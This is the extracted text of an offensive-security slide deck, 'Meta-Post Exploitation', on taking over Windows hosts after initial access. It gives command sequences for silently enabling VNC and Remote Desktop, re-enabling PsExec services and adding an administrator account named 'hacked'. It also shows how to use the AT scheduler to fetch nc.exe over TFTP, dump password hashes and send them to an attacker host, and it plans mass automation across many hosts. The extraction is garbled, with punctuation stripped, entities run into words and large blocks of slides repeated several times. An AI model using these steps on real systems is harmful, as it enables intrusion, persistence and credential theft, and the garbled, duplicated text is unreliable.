bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
